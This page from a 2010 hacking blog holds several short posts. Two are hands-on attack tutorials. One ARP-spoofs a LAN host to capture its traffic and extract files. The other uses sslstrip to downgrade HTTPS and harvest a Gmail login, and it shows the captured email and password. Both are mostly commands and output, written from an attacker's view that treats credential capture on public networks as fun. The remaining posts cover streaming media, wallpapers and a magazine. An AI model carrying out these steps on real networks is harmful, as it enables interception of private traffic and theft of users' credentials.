mitm packet capturing & basic analysis

17 06 2010

We all know the difference between a hub & a switch (if not, this is not the blog for you). As most networks these days will be switched, its no longer a case of plug in & dump packets. So here is the easy way to capture traffic from the network for investigation later. This works with wired or wireless. This is a combination of skillz in my SSLSTRIP post and the Image Extraction post.

Simply put, we use arpspoof to convince the gateway that we are the target, and the target that we are the gateway.

Target selection (our IP is 172.16.189.136, default gateway is 172.16.189.2)

root@bt:~# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0c:29:ab:b2:2c
          inet addr:172.16.189.136  Bcast:172.16.189.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:22 errors:0 dropped:0 overruns:0 frame:0
          TX packets:10 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:3682 (3.6 KB)  TX bytes:1753 (1.7 KB)
          Interrupt:19 Base address:0x2000

root@bt:~# netstat -nr
Kernel IP routing table
Destination     Gateway         Genmask         Flags   MSS Window  irtt Iface
172.16.189.0    0.0.0.0         255.255.255.0   U         0 0          0 eth0
0.0.0.0         172.16.189.2    0.0.0.0         UG        0 0          0 eth0

root@bt:~# nmap -sP 172.16.189.1-255

Starting Nmap 5.21 ( http://nmap.org ) at 2010-06-17 21:10 EST
Nmap scan report for 172.16.189.1
Host is up (0.00018s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 172.16.189.2
Host is up (0.0015s latency).
MAC Address: 00:50:56:E5:F7:F0 (VMware)
Nmap scan report for 172.16.189.135
Host is up (0.00076s latency).
MAC Address: 00:0C:29:09:04:71 (VMware)
Nmap scan report for 172.16.189.136
Host is up.
Nmap scan report for 172.16.189.254
Host is up (0.00050s latency).
MAC Address: 00:50:56:F8:EC:20 (VMware)
Nmap done: 255 IP addresses (5 hosts up) scanned in 4.36 seconds
root@bt:~#

So we have a couple of other hosts there, we will use 172.16.189.135.

We want to get traffic from 172.16.189.135 to the gateway (internet) sent to us, and traffic from the gateway back to 172.16.189.135 also sent to us, we do that with the following arpspoof commands.

Windows host before arpspoof:

C:\Documents and Settings\Administrator>arp -a

Interface: 172.16.189.135 --- 0x2
  Internet Address      Physical Address      Type
  172.16.189.2          00-50-56-e5-f7-f0     dynamic

arpspoof commands to run on our backtrack box, not forgetting to enable ip forwarding

root@bt:~# echo 1 > /proc/sys/net/ipv4/ip_forward

root@bt:~# arpspoof -i eth0 -t 172.16.189.135 172.16.189.2
0:c:29:ab:b2:2c 0:c:29:9:4:71 0806 42: arp reply 172.16.189.2 is-at 0:c:29:ab:b2:2c
0:c:29:ab:b2:2c 0:c:29:9:4:71 0806 42: arp reply 172.16.189.2 is-at 0:c:29:ab:b2:2c

root@bt:~# arpspoof -i eth0 -t 172.16.189.2 172.16.189.135
0:c:29:ab:b2:2c 0:50:56:e5:f7:f0 0806 42: arp reply 172.16.189.135 is-at 0:c:29:ab:b2:2c
0:c:29:ab:b2:2c 0:50:56:e5:f7:f0 0806 42: arp reply 172.16.189.135 is-at 0:c:29:ab:b2:2c

and our windows box ?

C:\Documents and Settings\Administrator>arp -a

Interface: 172.16.189.135 --- 0x2
  Internet Address      Physical Address      Type
  172.16.189.2          00-0c-29-ab-b2-2c     dynamic
  172.16.189.136        00-0c-29-ab-b2-2c     dynamic

and of course, kick off your tcpdump session (without the arpspoof traffic)

root@bt:~# tcpdump -s0 -i eth0 not arp -w eth0capture
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes

so, we have a shiny new file, full of data goodness – what to do with it. There are several ways you can look at the data:
urlsnarf – prints http requests
driftnet – extracts files from capture
tcpxtract – another extractor from captures **Needs installation, but it got me the best results**

Setup the apps to listen on the local interface in separate windows, then feed your packets into that interface with tcpreplay.

root@bt:~# urlsnarf -i lo
urlsnarf: listening on lo [tcp port 80 or port 8080 or port 3128]

root@bt:~# driftnet -i lo
driftnet: saving `/tmp/driftnet-5VbG3g/driftnet-4c1a110b643c9869.jpeg' as `driftnet-0.jpeg'
driftnet: saving `/tmp/driftnet-5VbG3g/driftnet-4c1a110b643c9869.jpeg' as `driftnet-1.jpeg'

root@bt:~# tcpreplay -i lo eth0capture-s0
sending out lo
processing file: eth0capture-s0
Actual: 18412 packets (15604605 bytes) sent in 105.88 seconds
Rated: 148490.3 bps, 1.13 Mbps/sec, 175.20 pps

Statistics for network device: lo
        Attempted packets:         18412
        Successful packets:        18412
        Failed packets:            0
        Retried packets (ENOBUFS): 0
        Retried packets (EAGAIN):  0


root@bt:~# apt-get install tcpxtract
root@bt:~# mkdir tcpxtract
root@bt:~# tcpxtract -f eth0capture-s0 -o tcpxtract/
Found file of type "html" in session [207.46.170.10:20480 -> 172.16.189.135:7429], exporting to tcpxtract/00000000.html
Found file of type "html" in session [207.46.170.10:20480 -> 172.16.189.135:7429], exporting to tcpxtract/00000001.html

There we go, we extracted some info from the packet capture. Next time I will cover a much nicer util to get our files out of the capture file.

Advertisements




internet killed the radio (and video) star

15 06 2010

I dont have Foxtel, mainly because of the 20 or 30 channels you have , once youve watched it for about a week you (well I did) work out there is nothing to watch. Enter the modern marvel of the Internet, global media, instantly available to the masses. I have been trialling several sites & solutions.

XBMC – XBOX media centre – now no longer developed & maintained for the XBOX. Thats right, the uuber XBOX media centre is no longer for the XBOX – this is because of the under powered hardware that is contained in the original XBOX. There is light at the end of the tunnel though – you can get XBMC for other platforms – Windows / OSX / Linux / AppleTV & also a live distro. This is a great media solution – possibly only trumped by the below:

Boxee – “Boxee is the best way to watch movies, TV shows and clips from the Internet on your TV. Basically, you install our free software on an affordable computer, like a Mac Mini or Acer Revo, and connect it to your TV with an HDMI or DVI cord (depending on the computer you use). To navigate Boxee from your couch, you can use an Apple Remote or one of several PC-remotes available.” – Ok official blurb out of the way, if you have access to a US based IP (VPN etc) – this is one of the best ways I have found to discover internet based TV, Movies & Music services. Do yourself a favour, check the site (or at least the Intro Video, load up a copy & have a good go at it. This has replaced my XBOX with XBMC. I have a small form factor PC, running Linux Mint (for its out of the box media support & plugin) – with Boxee installed on it for media. It rocks.

TV & Movies
Some of these require a US IP address – several options here, use google & have a look at VPN solutions, or do what I have done & get a VPS from Crucial Paradigm.

Hulu
TheWB
CastTV
Pandora
TVGorge
Grooveshark
YouTube
YouTube-Disco
Picrap





hakin9 magazine

14 06 2010

Im glad to see this is now available online. Its been hard to get in Australia & at $15 or $20 a pop it adds up. Jump here & download the issues – some great articles to be had for n00b to l33t
hakin9.org magazine





image extraction from packet capture

13 06 2010

Some very interesting tools used in this vid, showing that you dont need to be watching live streams to catch interesting fish 😀

Great video on using ettercap to capture traffic & a selection of tools to extract data (mainly images) from the traffic.

ettercap
foremost
tcpxtract (can be installed from the backtrack repos)
tcpreplay
urlsnarf/driftnet –> dsniff suite

Linked from the following post from “adaywithtape





sensational wallpapers

13 06 2010

I have been looking around a few websites, and stumbled upon this one for wallpapers – wallbase.net. Some AMAZING work in here, massive credit to all the creators & owners of this artwork – I am merely an impressed visitor.





hacking a computer – movie style

11 06 2010

http://gizmodo.com/5559058/how-to-hack-a-computer-action-movie-edition





capturing credentials with sslstrip

11 06 2010

You may or may not have seen this tool before, there are plenty of videos around that show you how to use it – let me add one more “howto” & show you my fun with it.

Scenario:

You are attached to the same network (sorry kids, not a remote vector) as the victim with a backtrack (doesnt need to be backtrack, but I use it regularly) machine and have downloaded sslstrip.

Get it: download & unpack

root@bt:~/scripts/sslstrip# wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.7.tar.gz
root@bt:~/scripts/sslstrip# tar zxvf sslstrip-0.7.tar.gz

Setup: you need to enable ip forwarding in linux & setup a forward for all port 80 traffic to port 10000 (default sslstrip port). Run sslstrip & get it to write the credentials out to a file with -w

root@bt:~/scripts/sslstrip# echo 1 > /proc/sys/net/ipv4/ip_forward
root@bt:~/scripts/sslstrip# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
root@bt:~/scripts/sslstrip/sslstrip-0.7# python sslstrip.py -f -w sslcreds-captured

Once this is done, we are nearly there – now to get users to send their traffic through your machine on the way to the gateway. In this case, the target is 192.168.0.141 & the real gateway is 192.168.0.254

root@bt:~# arpspoof -i eth0 -t 192.168.0.141 192.168.0.254
0:c:29:ab:b2:2c 0:c:29:9:4:71 0806 42: arp reply 192.168.0.254 is-at 0:c:29:ab:b2:2c
0:c:29:ab:b2:2c 0:c:29:9:4:71 0806 42: arp reply 192.168.0.254 is-at 0:c:29:ab:b2:2c
0:c:29:ab:b2:2c 0:c:29:9:4:71 0806 42: arp reply 192.168.0.254 is-at 0:c:29:ab:b2:2c
0:c:29:ab:b2:2c 0:c:29:9:4:71 0806 42: arp reply 192.168.0.254 is-at 0:c:29:ab:b2:2c

Cool – so now what … what have we actually done … lets deconstruct it a little:

Firstly linux has been configured to forward packets, we setup a redirect iptables rule to redirect all traffic except port 80, which it sends to sslstrip which we ran on the default port 10000 and we are writing out to log sslcreds-captured.

Next was to get the target to send their traffic to us instead of the gateway, using arpspoof we are telling our target that the gateway address of 192.168.0.254 is actually our nic

Our Target machine nic is 00-0C-29-09-04-71, which arpspoof automatically gathered when we ran it.

We could have easily gathered this from the backtrack machine

root@bt:~# nmap -sP 192.168.0.141

Starting Nmap 5.21 ( http://nmap.org ) at 2010-06-10 22:18 EST
Nmap scan report for 192.168.0.141
Host is up (0.00049s latency).
MAC Address: 00:0C:29:09:04:71 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.08 seconds

but to show the actual client config, here is the windows ipconfig /all output

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix  . :
Description . . . . . . . . . . . : VMware Accelerated AMD PCNet Adapter

Physical Address. . . . . . . . . : 00-0C-29-09-04-71
Dhcp Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IP Address. . . . . . . . . . . . : 192.168.0.141
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.0.254
DHCP Server . . . . . . . . . . . : 192.168.0.254
DNS Servers . . . . . . . . . . . : 8.8.8.8
Lease Obtained. . . . . . . . . . : Thursday, 10 June 2010 8:54:17 PM
Lease Expires . . . . . . . . . . : Friday, 11 June 2010 8:54:17 PM

So, what does the arp spoofing look like on the target
Before:

C:\Documents and Settings\Administrator>arp -a

Interface: 192.168.0.141 --- 0x2
Internet Address      Physical Address      Type
192.168.0.254         00-02-b3-a9-a5-13     dynamic

After:

C:\Documents and Settings\Administrator>arp -a

Interface: 192.168.0.141 --- 0x2
Internet Address      Physical Address      Type
192.168.0.254         00-0c-29-ab-b2-2c     dynamic

Notice the original gateway MAC address 00-02-b3-a9-a5-13 has been replaced by our attacker MAC 00-0c-29-ab-b2-2c.

User Experience:
We will use GMAIL as an example of this, but many many web pages use http for the body & simply use https for form post, which this script takes advantage of.

So our user wants to login to their GMAIL account, so they fire up the browser & type in http://www.gmail.com

Normal GMAIL page:

***Notice the url is https://http://www.google.com/accounts/……… & there is a padlock on the right hand side***

sslstrip GMAIL page:

***Notice the url is actually http://http://www.google.com/accounts/……… & there is a padlock on the left hand side, this padlock is actually a favicon of a padlock added by sslstrip to trick those not paying attention***

This is the only subtle difference that the user gets, sslstrip detects the https tags in the pages requested & re-writes them as http back to the client. From sslstrip to the server is still https, so GMAIL is happy its an ssl connection & the target is happy as he sees the identical logon page he is used to seeing, only its delivered as an http page, not https. As we are not trying to rewrite an https page back to the user, there are zero certificate popups etc.

So he logs in, gets his mail & lives happily ever after:

THE FUN BIT:

Remember we were writing to an output file

root@bt:~/scripts/sslstrip/sslstrip-0.7# cat sslcreds-captured
2010-06-10 22:07:25,992 SECURE POST Data (www.google.com):
ltmpl=default&ltmplcache=2&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3F&service=mail&rm=false&dsh=3964009503580918215&ltmpl=default&ltmpl=default&scc=1&GALX=EN7ZeXSvfzo&Email=johndoe@gmail.com&Passwd=J0hN%24_Sup3Rl33tP@ssw0rd&rmShown=1&signIn=Sign+in&asts=

The most interesting bits of that are ..
Email=johndoe@gmail.com
Passwd=J0hN%24_Sup3Rl33tP@ssw0rd
*note, the %24 is actually the hex value for the dollar ‘$’ symbol
Because johndoe is super secure & has chosen a long password he must be safe …. except for that one time he connected at the wrong internet cafe ……

GaMe-OvEr